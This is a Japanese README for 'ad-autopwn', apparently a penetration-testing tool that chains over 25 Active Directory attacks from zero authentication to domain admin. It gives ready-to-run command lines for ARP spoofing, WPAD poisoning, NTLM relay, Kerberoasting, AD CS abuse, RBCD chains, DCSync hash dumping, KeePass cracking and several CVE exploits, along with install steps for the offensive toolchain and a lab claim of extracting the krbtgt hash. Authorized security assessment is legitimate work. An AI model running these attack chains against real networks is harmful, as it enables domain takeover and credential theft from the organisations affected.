
ゼロ認証からドメイン管理者までの自動化されたActive Directory攻撃チェーンです。Kerberoast、AD CS ESC1-16、Shadow Credentials、RBCD、DCSync、Synacktiv 2026リフレクションエクスプロイトを含む25以上のテクニックを連鎖させます。許可されたペンテストのみ。
ゼロ認証からドメイン管理者へ — 自動化されたActive Directory攻撃チェーン
完全自動化されたペネトレーションテストツール。25以上の攻撃テクニックを連鎖させ、Active Directory環境を侵害します。許可されたセキュリティ評価用に設計されています。
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ Zero-Auth to Domain Admin — Attack Chain
Discover | Sniff | ARP | WPAD | WSUS | PXE | AD CS | SCCM | Roast
BloodHound | Reflect | Loot | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH を持つアカウントの無料ハッシュ)--spray-password でオプトイン).library-ms / .theme / .url ファイルbloodhound-python -c All 収集 + ZIP 分析WriteSPN、AddKeyCredentialLink、GenericAll/Write、WriteDacl/Owner、WriteAccountRestrictions、AddAllowedToAct、ForceChangePasswordWriteSPN → ghost-SPN アップグレード(CVE-2025-58726)AddKeyCredentialLink → シャドウ資格情報 → PKINIT → NT ハッシュComputer に対する GenericAll / WriteAccountRestrictions → RBCD チェーン → 管理者 TGS-altservice 書き換え、1フェーズで-altservice によるインライン$ サフィックス再試行 → 自動作成された <user>$ マシンアカウントを介した Linux ユーザー向け TGT → GSSAPI SSHnxc -x 経由の Get-CimInstance Win32_Process;mysql/sqlcmd/runas/KeePass/--password スタイルフラグ内のパスワードを正規表現で grepC:\Users 内の *.kdbx を検索、smbclient でダウンロード、keepass2john | hashcat -m 13400# 完全自動化 — ゼロ認証チェーン(すべて自動検出)
sudo ./ad-autopwn.py
# 認証情報あり — フルチェーン
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# AWS / VPC ラボ(レイヤー2攻撃ブロック)— 自動検出は引き続き動作
sudo ./ad-autopwn.py --no-arp --no-wpad
# 事前認証資格情報発見(ロックアウトセーフ)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# BloodHound グラフ収集 + 自動高価値分析
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# Dollar Ticket — 自動作成された root$ マシンアカウント経由の 'root' 用 TGT
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# RBCD+KCD チェーン — 完全な ghost-SPN + RBCD + altservice 書き換え、一発
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# AppLocker バイパス
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# ドライラン(全コマンドを表示、実行しない — バックグラウンドプロセスも)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1
apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
/opt/tools/ にクローン)git clone https://github.com/mverschu/CVE-2025-33073 /opt/tools/CVE-2025-33073
git clone https://github.com/dirkjanm/krbrelayx /opt/tools/krbrelayx
git clone https://github.com/Wh04m1001/DFSCoerce /opt/tools/DFSCoerce
git clone https://github.com/ShutdownRepo/ShadowCoerce /opt/tools/ShadowCoerce
git clone https://github.com/ShutdownRepo/pywhisker /opt/tools/pywhisker
git clone https://github.com/dirkjanm/PKINITtools /opt/tools/PKINITtools
git clone https://github.com/csandker/pxethiefy /opt/tools/pxethiefy
git clone https://github.com/garrettfoster13/sccmhunter /opt/tools/sccmhunter
git clone https://github.com/dirkjanm/mitm6 /opt/tools/mitm6
git clone https://github.com/Hackndo/pyGPOAbuse /opt/tools/pyGPOAbuse
git clone https://github.com/Hackndo/WebclientServiceScanner /opt/tools/WebclientServiceScanner
git clone https://github.com/almandin/Certihound /opt/tools/Certihound
pipx install coercer
pipx install wsuks --system-site-packages
kerbrute — 最新バイナリを
https://github.com/ropnop/kerbrute/releases から取得 — /usr/local/bin/ にインストールuserenum-cldap — 付属の CLDAP NetLogon-ping 列挙子(このリポジトリ内の
userenum-cldap.py;/usr/local/bin/userenum-cldap にインストール)asn1tools — pip install asn1tools(CLDAP 列挙ランタイム依存)# APT パッケージ
sudo apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
# 必要な全リポジトリ
for repo in mverschu/CVE-2025-33073 dirkjanm/krbrelayx \
Wh04m1001/DFSCoerce ShutdownRepo/ShadowCoerce \
ShutdownRepo/pywhisker dirkjanm/PKINITtools \
csandker/pxethiefy garrettfoster13/sccmhunter \
dirkjanm/mitm6 Hackndo/pyGPOAbuse \
Hackndo/WebclientServiceScanner almandin/Certihound; do
sudo git clone "https://github.com/$repo" "/opt/tools/$(basename $repo)"
done
# リポジトリが必要とする Python 依存関係
for repo in pywhisker PKINITtools sccmhunter pxethiefy mitm6 pyGPOAbuse Certihound; do
[ -f "/opt/tools/$repo/requirements.txt" ] && \
pip3 install --break-system-packages -r "/opt/tools/$repo/requirements.txt"
done
# Pipx パッケージ
pipx install coercer
pipx install wsuks --system-site-packages
# kerbrute(ropnop)バイナリ
sudo wget -q -O /usr/local/bin/kerbrute \
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
sudo chmod +x /usr/local/bin/kerbrute
# CLDAP userenum ランタイム依存
sudo pip3 install --break-system-packages asn1tools
# userenum-cldap 付属スクリプト(このリポジトリ)
sudo wget -q -O /usr/local/bin/userenum-cldap \
https://raw.githubusercontent.com/jonaslejon/ad-autopwn/main/userenum-cldap.py
sudo chmod +x /usr/local/bin/userenum-cldap
# ad-autopwn 自体
sudo cp ad-autopwn.py /usr/local/bin/ad-autopwn
sudo chmod +x /usr/local/bin/ad-autopwn
check_prerequisites() はすべての呼び出しの先頭で実行され、スクリプトが使用する各ツールについて緑の ✅ / 黄色の ⚠️ ステータスと、不足しているものに関するインストールヒントを表示します。
eu-west-1 上 — v4.10.0 の全フェーズカバレッジをエンドツーエンドで検証済み。
AWS での自動検出は、--no-arp --no-wpad だけで動作します(インターフェース、攻撃者 IP、
ドメイン、DC IP、DC FQDN はすべてサブネットスイープ + @<dc_ip> への dig フォールバックで自動検出)。stannis.baratheon → GenericAll → KINGSLANDING$ エッジで実証済み:単一の低権限資格情報から
DC 上の管理者 TGS まで 5 秒で到達。krbtgt を含む 20 の資格情報を抽出 — ゴールデンチケットが利用可能。--dry-run はすべてのコマンド(フォアグラウンド および バックグラウンド)を実行せずに表示 —
ARP スプーファー、mitm6、Responder、ntlmrelayx を起動しません。try/finally と os.chdir でラップされ、任意の終了パスで復元が正しいディレクトリに行われるように保証します。--no-cleanup はフォレンジックレビューのためにすべてを保持します。許可されたペネトレーションテストおよびセキュリティ研究専用です。
このツールは、許可されたエンゲージメント中にセキュリティ専門家が使用するために設計されています。コンピュータシステムへの不正アクセスは違法です。テスト前に必ず書面による許可を取得してください。
Triop AB — https://triop.se
MIT
| フェーズ | 認証 | 説明 |
|---|
full | 任意 | 完全自動化チェーン(認証情報あり/なしで自動検出) |
sniff | なし | パッシブ L2 トラフィック発見 |
discover | なし | kerbrute + CLDAP + AS-REP + pre2k + (オプトイン) スプレー |
arp | なし | ARP スプーフ + NTLM キャプチャ |
wpad | なし | WPAD/LLMNR ポイズニング(mitm6 / Responder) |
wsus | なし | WSUS NTLM リレー |
pxe | なし | PXE ブート資格情報窃取 |
enum | 必要 | ターゲット列挙(リレーターゲット、制約なし委任、WebClient ホスト) |
enrich | 必要 | nxc 13モジュールバッテリー(LAPS、timeroast、MAQ、nopac、zerologon、…)+ 自動コンシューマー |
bloodhound | 必要 | bloodhound-python -c All + 分析 + 自動アクションチェーン |
roast | 必要 | Kerberoast + AS-REP Roast |
adcs | 必要 | AD CS エクスプロイト(ESC1-ESC16) |
sccm | 必要 | SCCM NAA 資格情報窃取 |
exploit | 必要 | 特定ターゲットに対する NTLM 反射 / 強制エクスプロイト |
dcsync | 必要 (DA) | ドメインハッシュダンプ |
loot | 必要 | プロセスコマンドライン収集 + KeePass 発見/クラック |
tgs-rewrite | なし | オフライン ccache sname 書き換え(tgssub スタイル KCD バイパス) |
dollar-ticket | 必要 | KDC $-サフィックス再試行攻撃(Linux GSSAPI ターゲット) |
rbcd-kcd | 必要 | 完全な RBCD+KCD チェーンオーケストレーター(WriteSPN → ghost → RBCD → S4U+altservice) |
reflect-tcpport | 必要 | CVE-2026-24294 LPE プリミティブ(SMB-on-tcpport) |
reflect-loopback | 必要 | CVE-2026-26128 LPE プリミティブ(Unicode SPN 経由の Kerberos ループバック) |
kerb-reflect | 必要 | CVE-2025-58726 ghost-SPN AP-REQ 反射 |